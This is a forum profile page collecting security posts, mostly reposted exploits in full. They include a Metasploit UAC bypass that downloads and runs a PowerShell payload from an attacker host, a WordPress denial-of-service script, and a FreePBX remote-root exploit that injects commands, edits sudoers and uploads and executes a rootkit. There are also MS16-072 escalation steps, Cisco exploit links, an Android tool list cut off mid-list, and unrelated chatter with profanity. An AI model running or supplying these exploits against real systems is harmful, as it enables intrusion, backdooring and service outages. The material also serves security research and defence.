
Nytro


Everything posted by Nytro

  1. Nytro

    ChimeraPE

    chimera_pe ChimeraPE demo: maps another executable into the target process and runs both. This is an alternative method to the classic RunPE (process hollowing) - it can be used when we also want to run the original exe. WARNING: This is a 32-bit version. A 64-bit variant is coming soon. Link: https://github.com/hasherezade/demos/tree/master/chimera_pe
  2. Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit) ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::Runas include Post::Windows::Registry include Post::Windows::Powershell def initialize(info={}) super( update_info(info, 'Name' => 'Windows Escalate UAC Protection Bypass with Fileless', 'Description' => %q{ This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Graeber', 'Enigma0x3', 'Pablo Gonzalez' # Port to local exploit ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'], ], 'DisclosureDate'=> "Aug 15 2016" )) register_options([ OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']), OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']), OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ), ]) end def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! 
Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end def exploit validate_environment! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good 'UAC is set to Default' print_good 'BypassUAC can bypass this setting, continuing...' when UAC_NO_PROMPT print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead" runas_method return end keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command') if keys == nil print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!") end key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command') reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')" command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true}) if datastore['LOCAL'] if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") end file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command) end result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ') if result execute_script("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") print_good('Created registry entries to hijack!') end r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true}) check_permissions! end def validate_environment! 
fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system? winver = sysinfo['OS'] unless winver =~ /Windows Vista|Windows 2008|Windows [78]/ fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") end if is_uac_enabled? print_status 'UAC is Enabled, checking level...' else if is_in_admin_group? fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end end end Sursa: https://www.exploit-db.com/exploits/40268/
  3. WordPress 4.5.3 - Directory Traversal / Denial of Service Path traversal vulnerability in WordPress Core Ajax handlers Abstract A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. Contact For feedback or questions about this advisory mail us at sumofpwn at securify.nl The Summer of Pwnage This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. OVE ID OVE-20160712-0036 See also - CVE-2016-6896 - CVE-2016-6897 - #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin() Tested versions This issue was successfully tested on the WordPress version 4.5.3. Fix WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s). Introduction WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. Details The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin(). The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. 
Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers. Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case. Proof of concept The following Bash script can be used to trigger the denial of service condition. #!/bin/bash target="http://<target>" username="subscriber" password="password" cookiejar=$(mktemp) # login curl --cookie-jar "$cookiejar" \ --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \ "$target/wp-login.php" \ >/dev/null 2>&1 # exhaust apache for i in `seq 1 1000` do curl --cookie "$cookiejar" \ --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \ "$target/wp-admin/admin-ajax.php" \ >/dev/null 2>&1 & done rm "$cookiejar" Sursa: https://www.exploit-db.com/exploits/40288/
  4. FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation #!/usr/bin/env python # -*- coding, latin-1 -*- ###################################################### # # # DESCRIPTION # # FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net # # # # AUTHOR # # pgt - nullsecurity.net # # # # DATE # # 8-12-2016 # # # # VERSION # # freepbx0day.py 0.1 # # # # AFFECTED VERSIONS # # FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26) # # # # STATUS # # Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908 # # # # TESTED AGAINST # # * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso # # * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso # # # # TODO # # * SSL support (priv8) # # * parameter for TCP port # # # # HINT # # Base64 Badchars: '+', '/', '=' # # # ################################################################################ ''' Successful exploitation should looks like: [*] enum FreePBX version [+] target running FreePBX 13 [*] checking if target is vulnerable [+] target seems to be vulnerable [*] getting kernel version [!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 .... [+] Linux x86_64 platform [*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine [*] triggering incrond to gaining root permissions via sudo [*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD! [*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine [*] checking if we gained root permissions [!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root) [+] adding view.php to admin/.htaccess [*] creating upload script: admin/libraries/view.php [*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php [*] removing view.php from admin/.htaccess [*] rm -f admin/libraries/view.php [!] 
execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23 [*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers [*] removing all temp files [!] have fun and HACK THE PLANET! ''' import base64 import httplib import optparse import re from socket import * import sys import time BANNER = '''\033[0;31m ################################################################################ #___________ ________________________ ___ ____________ # #\_ _____/______ ____ ____\______ \______ \ \/ / /_ \_____ \ # # | __) \_ __ \_/ __ \_/ __ \| ___/| | _/\ / | | _(__ < # # | \ | | \/\ ___/\ ___/| | | | \/ \ | |/ \ # # \___ / |__| \___ >\___ >____| |______ /___/\ \ |___/______ / # # \/ \/ \/ \/ \_/ \/ # # _______ .___ # # \ _ \ __| _/____ ___.__. * Remote Root 0-Day # # / /_\ \ ______ / __ |\__ \< | | # # \ \_/ \ /_____/ / /_/ | / __ \ \___ | # # \_____ / \____ |(____ / ____| # # \/ \/ \/\/ # # # # * Remote Command Execution Exploit (FreePBX 14 is affected also) # # * Local Root Exploit (probably FreePBX 14 is also exploitable) # # * Backdoor Upload + Execute As Root # # # # * Author: pgt - nullsecurity.net # # * Version: 0.1 # # # ################################################################################ \033[0;m''' def argspage(): parser = optparse.OptionParser() parser.add_option('-u', default=False, metavar='<url>', help='ip/url to exploit') parser.add_option('-r', default=False, metavar='<file>', help='Linux 32bit bd/rootkit') parser.add_option('-R', default=False, metavar='<file>', help='Linux 64bit bd/rootkit') parser.add_option('-a', default='/', metavar='<path>', help='FreePBX path - default: \'/\'') args, args2 = parser.parse_args() if (args.u == False) or (args.r == False) or (args.R == False): print '' parser.print_help() print '\n' exit(0) return args def cleanup_fe(): print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' 
\ '\' from freepbx_engine' cmd = 'sed -i -- \' /echo \"asterisk ALL=(ALL) NOPASSWD\:ALL\">>' \ '\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine' command_execution(cmd) return def cleanup_lr(): print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ '\' from launch-restapps' cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \ 'modules/restapps/launch-restapps.sh' command_execution(cmd) return def cleanup_htaccess(): print '[*] removing view.php from admin/.htaccess' cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \ 'config\\\\.php|ajax\\\\.php/g\' .htaccess' command_execution(cmd) return def cleanup_view_php(): print '[*] rm -f admin/libraries/view.php' cmd = 'rm -f libraries/view.php' command_execution(cmd) return def cleanup_sudoers(): print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers' cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL) NOPASSWD:ALL/d\' /etc/sudoers' command_execution(cmd) return def cleanup_tmpfiles(): print '[*] removing all temp files' cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null' command_execution(cmd) return def check_platform(response): if (response.find('Linux') != -1) and (response.find('x86_64') != -1): print '[+] Linux x86_64 platform' return '64' elif (response.find('Linux') != -1) and (response.find('i686') != -1): print '[+] Linux i686 platform' cleanup_tmpfiles() sys.exit(1) return '32' else: print '[-] adjust check_platform() when you want to backdoor ' \ 'other platforms' cleanup_tmpfiles() sys.exit(1) def check_kernel(response): if response.find('w00t') != -1: start = response.find('w00t') + 4 end = response.find('w00tw00t') - 1 print '[!] Kernel: %s' % (response[start:end].replace('\\', '')) return check_platform(response[start:end]) def check_root(response): if response.find('uid=0(root)') != -1: start = response.find('w00t') + 4 end = response.find('w00tw00t') - 2 print '[!] 
w00tw00t w3 r r00t - %s' % (response[start:end]) return else: print '[-] we are not root :(' cleanup_fe() cleanup_lr() cleanup_tmpfiles() sys.exit(1) def build_request(filename): body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \ '&command=convert&module=recordings' % (filename) content_type = 'application/x-www-form-urlencoded; charset=UTF-8' return content_type, body def filter_filename(response): start = response.find('localfilename":"w00t') + 16 end = response.find('.wav') + 4 return response[start:end] def post(path, content_type, body): h = httplib.HTTP(ARGS.u) h.putrequest('POST', '%s%s' % (ARGS.a, path)) h.putheader('Host' , '%s' % (ARGS.u)) h.putheader('Referer' , 'http://%s/' % (ARGS.u)) h.putheader('Content-Type', content_type) h.putheader('Content-Length', str(len(body))) h.endheaders() h.send(body) errcode, errmsg, headers = h.getreply() return h.file.read() def encode_multipart_formdata(fields, filename=None): LIMIT = '----------lImIt_of_THE_fIle_eW_$' CRLF = '\r\n' L = [] L.append('--' + LIMIT) if fields: for (key, value) in fields.items(): L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) L.append('--' + LIMIT) if filename == None: L.append('Content-Disposition: form-data; name="file"; filename="dasd"') L.append('Content-Type: audio/mpeg') L.append('') L.append('da') else: L.append('Content-Disposition: form-data; name="file"; filename="dasd"') L.append('Content-Type: application/octet-stream') L.append('') L.append(open_file(filename)) L.append('--' + LIMIT + '--') L.append('') body = CRLF.join(L) content_type = 'multipart/form-data; boundary=%s' % (LIMIT) return content_type, body def create_fields(payload): fields = {'id': '1', 'name': 'aaaa', 'extension': '0', 'language': 'ru', 'systemrecording': '', 'filename': 'w00t%s' % (payload)} return fields def command_execution(cmd): upload_path = 'admin/ajax.php?module=recordings&command=' \ 'savebrowserrecording' cmd = base64.b64encode(cmd) payload = '`echo 
%s | base64 -d | sh`' % (cmd) fields = create_fields(payload) content_type, body = encode_multipart_formdata(fields) response = post(upload_path, content_type, body) filename = filter_filename(response) content_type, body = build_request(filename) return post('admin/ajax.php', content_type, body) def check_vuln(): h = httplib.HTTP(ARGS.u) h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a)) h.putheader('Host' , '%s' % (ARGS.u)) h.endheaders() errcode, errmsg, headers = h.getreply() response = h.file.read() if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1: print '[-] target seems not to be vulnerable' sys.exit(1) upload_path = 'admin/ajax.php?module=recordings&command' \ '=savebrowserrecording' payload = 'w00tw00t' fields = create_fields(payload) content_type, body = encode_multipart_formdata(fields) response = post(upload_path, content_type, body) if response.find('localfilename":"w00tw00tw00t') != -1: print '[+] target seems to be vulnerable' return else: print '[-] target seems not to be vulnerable' sys.exit(1) def open_file(filename): try: f = open(filename, 'rb') file_content = f.read() f.close() return file_content except IOError: print '[-] %s does not exists!' 
% (filename) sys.exit(1) def version13(): print '[*] checking if target is vulnerable' check_vuln() print '[*] getting kernel version' cmd = 'uname -a; echo w00tw00t' response = command_execution(cmd) result = check_kernel(response) if result == '64': backdoor = ARGS.R elif result == '32': backdoor = ARGS.r print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \ 'to freepbx_engine' cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\ ' \ 'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \ 'asterisk/bin/freepbx_engine' command_execution(cmd) print '[*] triggering incrond to gaining root permissions via sudo' cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart' command_execution(cmd) print '[*] waiting 20 seconds while incrond restarts applications' \ ' - /_!_\\ VERY LOUD!' time.sleep(20) cleanup_fe() #cleanup_lr() print '[*] checking if we gained root permissions' cmd = 'sudo -n id; echo w00tw00t' response = command_execution(cmd) check_root(response) print '[+] adding view.php to admin/.htaccess' cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \ 'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess' command_execution(cmd) print '[*] creating upload script: admin/libraries/view.php' cmd = 'echo \'<?php move_uploaded_file($_FILES["file"]' \ '["tmp_name"], "/tmp/23");?>\' > libraries/view.php' command_execution(cmd) print '[*] uploading %s to /tmp/23 via ' \ 'admin/libraries/view.php' % (backdoor) content_type, body = encode_multipart_formdata(False, backdoor) post('admin/libraries/view.php', content_type, body) cleanup_htaccess() cleanup_view_php() print '[!] 
execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \ ' rm -f /tmp/23' cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23' setdefaulttimeout(5) try: command_execution(cmd) except timeout: ''' l4zY w0rk ''' setdefaulttimeout(20) try: cleanup_sudoers() cleanup_tmpfiles() except timeout: cleanup_tmpfiles() return def enum_version(): h = httplib.HTTP(ARGS.u) h.putrequest('GET', '%sadmin/config.php' % (ARGS.a)) h.putheader('Host' , '%s' % (ARGS.u)) h.endheaders() errcode, errmsg, headers = h.getreply() response = h.file.read() if response.find('FreePBX 13') != -1: print '[+] target running FreePBX 13' return 13 else: print '[-] target is not running FreePBX 13' return False def checktarget(): if re.match(r'^[0-9.\-]*$', ARGS.u): target = ARGS.u else: try: target = gethostbyname(ARGS.u) except gaierror: print '[-] \'%s\' is unreachable' % (ARGS.u) sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(5) result = sock.connect_ex((target, 80)) sock.close() if result != 0: '[-] \'%s\' is unreachable' % (ARGS.u) sys.exit(1) return def main(): print BANNER checktarget() open_file(ARGS.r) open_file(ARGS.R) print '[*] enum FreePBX version' result = enum_version() if result == 13: version13() print '[!] have fun and HACK THE PLANET!' return if __name__ == '__main__': ARGS = argspage() try: main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.01) sys.exit(1) #EOF Sursa: https://www.exploit-db.com/exploits/40232/
  5. Cisco ASA / PIX - Privilege Escalation (EPICBANANA) # Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA) # Date: 19-08-2016 # Exploit Author: Shadow Brokers # Vendor Homepage: http://www.cisco.com/ Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip Sursa: https://www.exploit-db.com/exploits/40271/
  6. Cisco ASA 8.x - Authentication Bypass (EXTRABACON) # Exploit Title: Cisco ASA 8.X Authentication Bypass # Date: 17-08-2016 # Exploit Author: Equation Group # Vendor Homepage: Cisco # Software Link: Cisco # Version: Cisco ASA 8.X # Tested on: Cisco ASA 8.4.2 # CVE : Not sure Requirements: * SNMP read (public) string * Access to SNMP service * SSH port accessible Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40258.zip Sursa: https://www.exploit-db.com/exploits/40258/
  7. Cel mai recent smartphone de top al celor de la Samsung, Galaxy Note 7, pierde la scor meciul cu iPhone 6S când vine vorba despre viteza de deschidere a aplicaţiilor. Galaxy Note 7 este un flagship proaspăt lansat. iPhone 6S face în curând un an de când a intrat pe piaţă. Cu toate astea, smartphone-ul celor de la Apple se dovedeşte mult mai rapid decât phablet-ul tocmai lansat de Samsung, scrie News.ro. În testul publicat pe YouTube de către cei de la PhoneBuff a fost testată exclusiv viteza cu care sunt deschise acelaşi set de aplicaţii şi jocuri pe cele două telefoane. În total, cele două dispozitive au fost cronometrate pentru deschiderea a 14 aplicaţii şi jocuri. În final, iPhone 6S a încheiat testul după 1 minut şi 21 de secunde. Galaxy Note 7 a avut nevoie de 2 minute şi 4 secunde. Cea mai mare diferenţă dintre cele două dispozitive s-a făcut la nivelul jocurilor. Acestea au pornit semnificativ mai repede pe iPhone 6S decât pe Galaxy Note 7. Aceste rezultate s-au înregistrat în pofida faptului că Note 7 dispune de dotări hardware superioare. iPhone 6S foloseşte un procesor dezvoltat acum doi ani şi are 2 GB memorie RAM, în timp ce Note 7 are un procesor lansat acum 6 luni şi 4 GB memorie RAM. Concluzia logică este că software-ul face diferenţa. Un sistem de operare optimizat special pentru un anumit set de componente va fi net superior unuia scalat pentru a rula pe sute de configuraţii posibile. Apple deţine controlul complet asupra iPhone şi poate optimiza sistemul de operare iOS pentru a rula cât mai eficient. Prin urmare şi cerinţele hardware sunt mai mici atunci când software-ul este optimizat corect. De cealaltă parte avem Android, care, la fel ca Windows pe PC-uri, trebuie să ruleze pe un număr foarte mare de dispozitive. Sarcina optimizării software-ului ar trebui să cadă pe producător. Acesta, însă, este ocupat cu lansarea într-un ritm alert a noi şi noi dispozitive şi nu se preocupă de acest aspect, încercând să compenseze cu dotările hardware. 
Ba chiar, mai mult, producătorul adaugă şi el sarcini suplimentare sistemului de operare, prin pre-instalarea de aplicaţii mai mult sau mai puţin inutile pentru utilizatori. Aşa se ajunge la discrepanţa majoră în care un telefon cu dotări net superioare rulează mult mai slab decât unul cu componente mai slabe, dar un software bine optimizat. Fanii Android se vor putea bucura de aşa ceva abia în momentul în care Google va dezvolta propriul smartphone şi va optimiza special sistemul de operare pentru el. Galaxy Note 7 este disponibil în România la un preţ de 3.900 de lei. Versiunea corespunzătoare de iPhone 6S, cu acelaşi spaţiu de stocare de 64 GB, costă aproximativ 3.800 de lei. Sursa: http://www.digi24.ro/Stiri/Digi24/Sci-tech/Gadget/cel+mai+rapid+telefon
  8. Nytro

    Tema

    Este un progres imens de la vBulletin la IPBoard. Nu mai stiu nici eu cate linii de cod am modificat in acea platforma (vB)... 1. Este cel mai mare forum de securitate, nu de web design - te inteleg daca apar probleme de securitate banale, nu daca se vede urat o tema 2. Nu esti singurul, insa sunt multe persoane care "au crescut" pe forum si care au avut de castigat (un job de exemplu) de pe urma sa, dar apoi l-au uitat (stii tu termenul - leeching) 3. S-au pierdut posturile din luna ianuarie a acestui an, atat. Si am urmarit forumul in acea perioada, crede-ma, nu s-a pierdut mare lucru 4. Sunt multi care au interes sa invete, putini capabili (ca timp) sa ii ajute 5. Moderatorii, ca si mine, au familie si job si nu mai au timp de forum 6. Profilul utilizatorului RST nu este acela, doar ca aceia ies mai mult in evidenta. Forumul nu e destinat programatorilor ci pasionatilor de securitate IT care trebuie sa aiba in sange ceva din descrierea ta. Cei care sunt programatori intra aici si deprind trasaturi non-programatorice cum ar fi "think outside the box" Pentesterii (ca si mine) isi pierd timpul pe aici. Insa sunt prea putini care au timpul si daruirea necesara de a posta materiale de calitate. Nu ai mintit, te inteleg, sunt de acord cu tine (nu in totalitate). Exista posibilitatea ca acest forum sa dispara, nu neg asta, dar cat timp putem ajuta comunitatea romaneasca sa se dezvolte pe calea cea dreapta, forumul va ramane in picioare. Ma gandesc la tine ca la altii: probabil ai calitatile tehnice si psihologice necesare de a-i ajuta pe altii, dar se pare ca nu o faci. De ce? Pentru ca noua, romanilor, ne place doar sa ne plangem si vrem sa ii vedem pe altii ca fac ceva. Daca vrei o schimbare, incepe prin tine. // Nytro
  9. "In the meantime you can submit a paper at the Call for Papers. Maybe, you'll be the next cyber security rock star. :-)"
  10. Nytro

    Tema

    PS: Cand puneti imagini, incercati sa folositi si voi HTTPS in loc de HTTP...
  11. Nytro

    Tema

    Mai sunt probleme: 1. Legate de tema (o sa mai lucrez la ea) 2. Legate de imagini postate pe forum (o sa verific) 3. Legate de imagini de profil/avatar - daca nu va merge, uploadati din nou si ar trebui sa fie ok. Muie InvisionPower shitservices.
  12. Nytro

    Tema

    Lucrez la el, o sa fie probleme si o sa arate nasol intre timp.
  13. Nytro

    Tema

    Salut, Dupa cum puteti observa, au aparut cateva probleme legate de tema. Imi bag pula in mortii si ranitii astora de la IP Board.
  14. Microsoft Windows Group Policy - Privilege Escalation (MS16-072) # Exploit Title: Group Policy Elevation of Privilege Vulnerability # Date: 08-08-2016 # Exploit Author: Nabeel Ahmed # Tested on: Windows 7 Professional (x32/x64) # CVE : CVE-2016-3223 # Category: Privilege Escalation SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials) SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies. 1) Prerequisites: - Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local) - Domain User Credentials are known with no Administrative rights. - Computer has to be connected on a network. - Fake Domain Controller 2) Reproduce: STEP 1: Determine domain of the target computer (e.g. domain.local) STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1) STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local). STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!). STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials). STEP 6: Establish network connection between the target system and the newly created Domain Controller. STEP 7: Create a Group Policy called "Create Local Admin" STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators". 
STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force" STEP 10: User Policy update will complete successfully. STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators" STEP 12: "TestAdmin" user will be member of the Administrators group. 3) Impact: A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller 4) Solution: Install the latest patches from 14-06-2016 using Windows Update. 5) References: https://technet.microsoft.com/en-us/library/security/ms16-072.aspx https://support.microsoft.com/en-us/kb/3163622 6) Credits: Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com) Sursa: https://www.exploit-db.com/exploits/40219/
  15. 25 Awesome Android Reverse Engineering Tools A curated list of awesome Android reverse engineering tools. Be sure to check out our list of IDA Pro alternatives and best deobfuscation tools, too. 1. SMALI/BAKSMALI smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.) 2. ANDBUG AndBug is a debugger targeting the Android platform’s Dalvik virtual machine intended for reverse engineers and developers. It uses the same interfaces as Android’s Eclipse debugging plugin, the Java Debug Wire Protocol (JDWP) and Dalvik Debug Monitor (DDM) to permit users to hook Dalvik methods, examine process state, and even perform changes. Unlike Google’s own Android Software Development Kit debugging tools, AndBug does not require or expect source code. It does, however, require that you have some level of comfort with Python, as it uses a concept of scripted breakpoints, called “hooks”, for most nontrivial tasks. 3. ANDROGUARD Androguard is a full python tool to play with Android files. DEX, ODEX APK Android’s binary xml Android resources Disassemble DEX/ODEX bytecodes Decompiler for DEX/ODEX files 4. APKTOOL A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step by step. It also makes working with an app easier because of its project-like file structure and automation of some repetitive tasks like building an apk, etc. Features: Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. 
and XMLs) Rebuilding decoded resources back to binary APK/JAR Organizing and handling APKs that depend on framework resources Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali) Helping with repetitive tasks 5. ANDROID FRAMEWORK FOR EXPLOITATION Android Framework for Exploitation is a framework for exploiting android based devices and applications. 6. BYPASS SIGNATURE AND PERMISSION CHECKS FOR IPCS This tool leverages Cydia Substrate to bypass signature and permission checks for IPCs. 7. ANDROID OPENDEBUG This tool leverages Cydia Substrate to make all applications running on the device debuggable; once installed any application will let a debugger attach to them. 8. DARE Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techniques developed for traditional Java applications. 9. DEX2JAR Tools to work with android .dex and java .class files. 10. ENJARIFY Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications. 11. DEDEXER Dedexer is a disassembler tool for DEX files. DEX is a format introduced by the creators of the Android platform. The format and the associated opcode set is in distant relationship with the Java class file format and Java bytecodes. Dedexer is able to read the DEX format and turn into an “assembly-like format”. This format was largely influenced by the Jasmin syntax but contains Dalvik opcodes. For this reason, Jasmin is not able to compile the generated files. 12. FINO An Android Dynamic Analysis Tool. 13. 
INDROID The aim of the project is to demonstrate that a simple debugging functionality on *nix systems a.k.a. ptrace() can be abused by malware to inject malicious code in remote processes. Indroid provides a CreateRemoteThread() equivalent for ARM based *nix devices. If you want to get a deeper insight into the working of the framework you may: Watch the Defcon 19 video on Jugaad – http://www.youtube.com/watch?v=vju6tq1lp0k Read the paper – http://www.slideshare.net/null0x00/project-jugaad 14. INTENTSNIFFER Intent Sniffer is a tool that can be used on any device using the Google Android operating system (OS). On the Android OS, an Intent is a description of an action to be performed, such as startService to start a service. The Intent Sniffer tool monitors broadcast Intents routed at runtime. It does not see explicit broadcast Intents, but defaults to (mostly) unprivileged broadcasts. There is an option to see recent tasks Intents (GET_TASKS), as Activity’s intents are visible when started. The tool can also dynamically update Actions & Categories. 15. INTROSPY Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues. 16. JAD Jad is a Java decompiler. 17. JD-GUI JD-GUI is a standalone graphical utility that displays Java source code of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. 18. CFR CFR will decompile modern Java features – Java 8 lambdas (pre and post Java beta 103 changes), Java 7 String switches etc, but is written entirely in Java 6. 19. KRAKATAU Krakatau currently contains three tools – a decompiler and disassembler for Java classfiles and an assembler to create classfiles. 20. PROCYON While still incomplete, tests seem to indicate that the Procyon decompiler can generally hold its own against the other leading Java decompilers out there. 21. 
